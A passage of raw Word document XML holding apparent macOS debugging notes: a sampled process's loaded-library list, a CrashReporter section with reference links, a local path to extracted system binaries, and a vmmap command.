        <w:t xml:space="preserve">    0x7fffd03a2000 -     0x7fffd05b5fff  libFosl_dynamic.dylib (16.37) &lt;D5551823-1E3D-3BDE-968C-BF022EE4958D&gt; /usr/lib/libFosl_dynamic.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd05d1000 -     0x7fffd05d8fff  libMatch.1.dylib (27) &lt;15FC6217-23E1-3DF0-A5F5-E4C67AED70B5&gt; /usr/lib/libMatch.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd05d9000 -     0x7fffd05d9fff  libOpenScriptingUtil.dylib (172) &lt;D025E180-BB3B-3FFA-98FC-B6835354D723&gt; /usr/lib/libOpenScriptingUtil.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd05da000 -     0x7fffd05ddffb  libScreenReader.dylib (477.10.20) &lt;B48924E9-5301-3141-9D62-ADA2852D5BAA&gt; /usr/lib/libScreenReader.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd05de000 -     0x7fffd05dfff3  libSystem.B.dylib (1238) &lt;CFC3669C-FB44-3A51-8815-1E84A168F3C5&gt; /usr/lib/libSystem.B.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd064b000 -     0x7fffd0676ffb  libarchive.2.dylib (41.20.1) &lt;FC116AC3-EB4A-3252-821C-4E1703879C82&gt; /usr/lib/libarchive.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0677000 -     0x7fffd06ebfff  libate.dylib (1.12.12) &lt;DD989482-B873-3094-97BB-2B5AE8D3B544&gt; /usr/lib/libate.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd06ef000 -     0x7fffd06efff3  libauto.dylib (187) &lt;5BBF6A00-CC76-389D-84E7-CA88EDADE683&gt; /usr/lib/libauto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd06f0000 -     0x7fffd0700ff3  libbsm.0.dylib (34) &lt;20084796-B04D-3B35-A003-EA11459557A9&gt; /usr/lib/libbsm.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0701000 -     0x7fffd070fff7  libbz2.1.0.dylib (38) &lt;6FD3B63F-0F86-3A25-BD5B-E243F58792C9&gt; /usr/lib/libbz2.1.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffd0710000 -     0x7fffd0766ff7  libc++.1.dylib (307.4) &lt;BEE86868-F831-384C-919E-2B286ACFE87C&gt; /usr/lib/libc++.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0767000 -     0x7fffd0791fff  libc++abi.dylib (307.2) &lt;1CEF8ABB-7E6D-3C2F-8E0A-E7884478DD23&gt; /usr/lib/libc++abi.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0792000 -     0x7fffd07a2ffb  libcmph.dylib (6) &lt;2B5D405E-2D0B-3320-ABD6-622934C86ABE&gt; /usr/lib/libcmph.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd07a3000 -     0x7fffd07b8fc3  libcompression.dylib (34) &lt;1691D6F2-46CD-3DA6-B44F-24CDD9BD0E4E&gt; /usr/lib/libcompression.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd07b9000 -     0x7fffd07b9ff7  libcoretls.dylib (121.1.1) &lt;F3BAB54C-DA82-37C3-A218-46FEB179D555&gt; /usr/lib/libcoretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd07ba000 -     0x7fffd07bbffb  libcoretls_cfhelpers.dylib (121.1.1) &lt;D12709F3-BBE3-3CF7-9070-C2A0803F5526&gt; /usr/lib/libcoretls_cfhelpers.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0af7000 -     0x7fffd0b4aff7  libcups.2.dylib (450) &lt;04CA1F55-4B70-3D65-B4B1-62F6C271A9EF&gt; /usr/lib/libcups.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0b9b000 -     0x7fffd0ba2ff3  libdscsym.dylib (145) &lt;A130C01E-AC0A-3733-B34C-71741DFFCC7E&gt; /usr/lib/libdscsym.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0bc4000 -     0x7fffd0bc4fff  libenergytrace.dylib (15) &lt;A1B040A2-7977-3097-9ADF-34FF181EB970&gt; /usr/lib/libenergytrace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0bd4000 -     0x7fffd0bd9ff7  libheimdal-asn1.dylib (498.20.2) &lt;C9B5464F-4A2E-3E3F-B514-B0911B5CB0DA&gt; /usr/lib/libheimdal-asn1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0bda000 -     0x7fffd0cccff7  libiconv.2.dylib (50) &lt;42125B35-81D7-3FC4-9475-A26DBE10884D&gt; /usr/lib/libiconv.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0ccd000 -     0x7fffd0ef2fff  libicucore.A.dylib (57132.0.1) &lt;C8176937-9271-3F0E-829D-F3BBB9DD44B5&gt; /usr/lib/libicucore.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0ef8000 -     0x7fffd0ef9fff  liblangid.dylib (126) &lt;3F4530C9-8BE1-3AA7-9A82-98694D240866&gt; /usr/lib/liblangid.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0efa000 -     0x7fffd0f13ffb  liblzma.5.dylib (10) &lt;44BD0279-99DD-36B5-8A6E-C11432E2098D&gt; /usr/lib/liblzma.5.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0f14000 -     0x7fffd0f2aff7  libmarisa.dylib (5) &lt;2183D484-032D-3DE5-8984-3A14006E034E&gt; /usr/lib/libmarisa.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffd0f2b000 -     0x7fffd11d5fff  libmecabra.dylib (744.2.2) &lt;C6C3EA2C-1DC7-3DCB-8A20-C645E38524AB&gt; /usr/lib/libmecabra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1208000 -     0x7fffd1281ff3  libnetwork.dylib (856.20.4) &lt;5012EFF3-8FF4-317D-B328-AB21E3B5CA8C&gt; /usr/lib/libnetwork.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1282000 -     0x7fffd1652d97  libobjc.A.dylib (706) &lt;F9AFE665-A3A2-3285-9495-19803A565861&gt; /usr/lib/libobjc.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1655000 -     0x7fffd1659fff  libpam.2.dylib (21) &lt;352F8FF6-2248-3594-B357-8D031DEFB06C&gt; /usr/lib/libpam.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd165a000 -     0x7fffd168aff7  libpcap.A.dylib (67) &lt;450DB888-2C0C-3085-A5F1-69324DFE902C&gt; /usr/lib/libpcap.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd16a8000 -     0x7fffd16c4ffb  libresolv.9.dylib (64) &lt;A244AE4C-00B0-396C-98FF-97FE4DB3DA30&gt; /usr/lib/libresolv.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd16c5000 -     0x7fffd16feff3  libsandbox.1.dylib (592.21.2) &lt;7A698C92-CD5C-3BFF-A215-2BE2DE31F88E&gt; /usr/lib/libsandbox.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd16ff000 -     0x7fffd1711ffb  libsasl2.2.dylib (209) &lt;5A177BA8-362D-32DA-8D14-69AB191648B3&gt; /usr/lib/libsasl2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1712000 -     0x7fffd1713ff3  libspindump.dylib (229) &lt;322AE558-5040-3F9A-8203-F64D8B0B507A&gt; /usr/lib/libspindump.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1714000 -     0x7fffd185cfff  libsqlite3.dylib (252) &lt;FCA29CD2-E8E4-3324-8E2C-19BDC11F0338&gt; /usr/lib/libsqlite3.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd194e000 -     0x7fffd195bfff  libxar.1.dylib (354) &lt;AAFCF321-8100-3622-880B-9661DCA35D69&gt; /usr/lib/libxar.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd195f000 -     0x7fffd1a4effb  libxml2.2.dylib (30.11) &lt;26676155-64CE-323F-B73C-AD77AF5982E8&gt; /usr/lib/libxml2.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1a4f000 -     0x7fffd1a78fff  libxslt.1.dylib (15.8) &lt;FFF5DD45-F544-34B2-BE3C-DB877DC60081&gt; /usr/lib/libxslt.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1a79000 -     0x7fffd1a8aff3  libz.1.dylib (67) &lt;46E3FFA2-4328-327A-8D34-A03E20BFFB8E&gt; /usr/lib/libz.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1a99000 -     0x7fffd1a9dff7  libcache.dylib (79) &lt;84E55656-FDA9-3B29-9E4F-BE31B2C0AA3C&gt; /usr/lib/system/libcache.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffd1a9e000 -     0x7fffd1aa8fff  libcommonCrypto.dylib (60092.20.1) &lt;31040F10-5E57-3B9C-8D5B-33AD87D1BEE8&gt; /usr/lib/system/libcommonCrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1aa9000 -     0x7fffd1ab0fff  libcompiler_rt.dylib (62) &lt;486BDE52-81B4-3446-BD72-23977CAE556F&gt; /usr/lib/system/libcompiler_rt.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1ab1000 -     0x7fffd1ab9fff  libcopyfile.dylib (138) &lt;0DA49B77-56EC-362D-98FF-FA78CFD986D6&gt; /usr/lib/system/libcopyfile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1aba000 -     0x7fffd1b3cfdb  libcorecrypto.dylib (442.20.2) &lt;2684CC01-087E-33E2-8219-AAA3BBD9BFD7&gt; /usr/lib/system/libcorecrypto.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b3d000 -     0x7fffd1b6ffff  libdispatch.dylib (703.20.1) &lt;877B505D-826C-3246-84F7-0F850636039E&gt; /usr/lib/system/libdispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b70000 -     0x7fffd1b75ff3  libdyld.dylib (421.2) &lt;7BFA3476-6210-3BCB-8CE8-9B952F87BD84&gt; /usr/lib/system/libdyld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b76000 -     0x7fffd1b76ffb  libkeymgr.dylib (28) &lt;09CD7CA6-46D2-3A9F-B9F1-7C4CA5CA0D68&gt; /usr/lib/system/libkeymgr.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b77000 -     0x7fffd1b83ffb  libkxld.dylib (3789.21.3) &lt;F12B5274-44AD-3268-A793-31EF351A4BD9&gt; /usr/lib/system/libkxld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b84000 -     0x7fffd1b84fff  liblaunch.dylib (972.20.3) &lt;7AB2E2EA-8B47-3420-87CE-5EE18A4EEE49&gt; /usr/lib/system/liblaunch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b85000 -     0x7fffd1b8afff  libmacho.dylib (894) &lt;1EAE5ADD-490C-3B1F-9F97-447BA8E0E90F&gt; /usr/lib/system/libmacho.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b8b000 -     0x7fffd1b8dff3  libquarantine.dylib (85) &lt;F3E47D7C-8776-327C-9426-DD7DEB30DBDD&gt; /usr/lib/system/libquarantine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b8e000 -     0x7fffd1b8fffb  libremovefile.dylib (45) &lt;C4FC07FF-ED86-382E-B06F-33C34718080C&gt; /usr/lib/system/libremovefile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1b90000 -     0x7fffd1ba8ff7  libsystem_asl.dylib (349.1.1) &lt;F0987490-8427-367F-B302-A05A7D61FEBF&gt; /usr/lib/system/libsystem_asl.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1ba9000 -     0x7fffd1ba9ff7  libsystem_blocks.dylib (67) &lt;B8C3701D-5A91-3D35-999D-2DC8D5393525&gt; /usr/lib/system/libsystem_blocks.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1baa000 -     0x7fffd1c37fef  libsystem_c.dylib (1158.20.4) &lt;5F9531F5-EDA3-3D25-A827-3E0FD6B392BA&gt; /usr/lib/system/libsystem_c.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffd1c38000 -     0x7fffd1c3bffb  libsystem_configuration.dylib (888.20.5) &lt;CDC55FCB-C1FC-350D-A919-5DBCFC835B63&gt; /usr/lib/system/libsystem_configuration.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1c3c000 -     0x7fffd1c3ffff  libsystem_coreservices.dylib (41.2) &lt;5DE691C6-7EE6-3210-895D-9EA3ECBC09B4&gt; /usr/lib/system/libsystem_coreservices.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1c40000 -     0x7fffd1c58ffb  libsystem_coretls.dylib (121.1.1) &lt;8F7E9B12-400D-3276-A9C5-4546B0258554&gt; /usr/lib/system/libsystem_coretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1c59000 -     0x7fffd1c5ffff  libsystem_dnssd.dylib (765.20.4) &lt;28E52C39-DF10-340F-A3EC-C0119AF6361F&gt; /usr/lib/system/libsystem_dnssd.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1c60000 -     0x7fffd1c89fff  libsystem_info.dylib (503) &lt;C686B834-5E7D-382C-AF6E-44AB78EE83E2&gt; /usr/lib/system/libsystem_info.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1c8a000 -     0x7fffd1cacff7  libsystem_kernel.dylib (3789.21.3) &lt;EC53F92A-0DFA-3027-A220-414A01F17B2E&gt; /usr/lib/system/libsystem_kernel.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1cad000 -     0x7fffd1cf4fe7  libsystem_m.dylib (3121.4) &lt;7F86C291-B105-31C1-9923-90EBAB22B73F&gt; /usr/lib/system/libsystem_m.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1cf5000 -     0x7fffd1d13ff7  libsystem_malloc.dylib (116) &lt;F9840080-4C2C-3F3B-8087-7C738F12A1C7&gt; /usr/lib/system/libsystem_malloc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d14000 -     0x7fffd1d6bff3  libsystem_network.dylib (856.20.4) &lt;2BAFB24F-999C-3148-BDD8-F28E05F716F7&gt; /usr/lib/system/libsystem_network.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d6c000 -     0x7fffd1d75ff3  libsystem_networkextension.dylib (563.20.3) &lt;971DD3AD-D17A-32FF-95DE-0A5A979E68AE&gt; /usr/lib/system/libsystem_networkextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d76000 -     0x7fffd1d7fff3  libsystem_notify.dylib (165.20.1) &lt;EAD023A2-AD3F-31C8-9489-274B9A42DA61&gt; /usr/lib/system/libsystem_notify.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d80000 -     0x7fffd1d88fe7  libsystem_platform.dylib (126.1.2) &lt;2F2D6A81-C36C-353D-B27B-A6643A32375E&gt; /usr/lib/system/libsystem_platform.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d89000 -     0x7fffd1d93ff7  libsystem_pthread.dylib (218.20.1) &lt;46375095-4731-3034-9D87-396DE95FC697&gt; /usr/lib/system/libsystem_pthread.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d94000 -     0x7fffd1d97ff7  libsystem_sandbox.dylib (592.21.2) &lt;2D42A2BF-A7AF-352A-A821-D8F6E85A63AC&gt; /usr/lib/system/libsystem_sandbox.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffd1d98000 -     0x7fffd1d99fff  libsystem_secinit.dylib (24) &lt;A54B8FEF-E792-3C54-8E0B-E80A376662F2&gt; /usr/lib/system/libsystem_secinit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1d9a000 -     0x7fffd1da1fff  libsystem_symptoms.dylib (532.1.1) &lt;8FB7CA37-79EF-3651-B5B9-B5E1E0947067&gt; /usr/lib/system/libsystem_symptoms.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1da2000 -     0x7fffd1dc2ff7  libsystem_trace.dylib (518.20.8) &lt;C029B910-A65F-35F6-B194-B933B454EAB4&gt; /usr/lib/system/libsystem_trace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1dc3000 -     0x7fffd1dc8ffb  libunwind.dylib (35.3) &lt;9F7C2AD8-A9A7-3DE4-828D-B0F0F166AAA0&gt; /usr/lib/system/libunwind.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd1dc9000 -     0x7fffd1df2ff7  libxpc.dylib (972.20.3) &lt;85EB25FD-218F-38EE-9E69-391CC8EBE6C5&gt; /usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t>Sample analysis of process 24910 written to file /dev/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2363" w:rsidRDefault="00236B14" w:rsidP="003E2363">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Console</w:t>
      </w:r>
      <w:r w:rsidR="00A17E1A">
        <w:t xml:space="preserve"> (CrashReporter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2363" w:rsidRDefault="003E2363" w:rsidP="002151C5"/>
    <w:p w:rsidR="003E2363" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidR="003E2363" w:rsidRPr="0092264A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://stackoverflow.com/questions/14473001/how-to-monitor-a-process-on-os-x</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E2363" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r w:rsidR="003E2363" w:rsidRPr="0092264A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/content/technotes/tn2004/tn2123.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="003E2363" w:rsidRDefault="00236B14" w:rsidP="002151C5">
      <w:r w:rsidRPr="00236B14">
        <w:t>M:\Work\Mac_All\MacShare\2015-04-07\OSX binary all\MacOSX_10.10.4_Binary\System\Library\PrivateFrameworks\CrashReporterSupport.framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="002151C5">
      <w:r w:rsidRPr="00236B14">
        <w:t>CrashReporterSupport</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00236B14">
        <w:t>CRSaveProblemReport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="002151C5"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="002151C5"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>sh-3.2# vmmap 23599 | grep Crash</w:t>
      </w:r>
    </w:p>
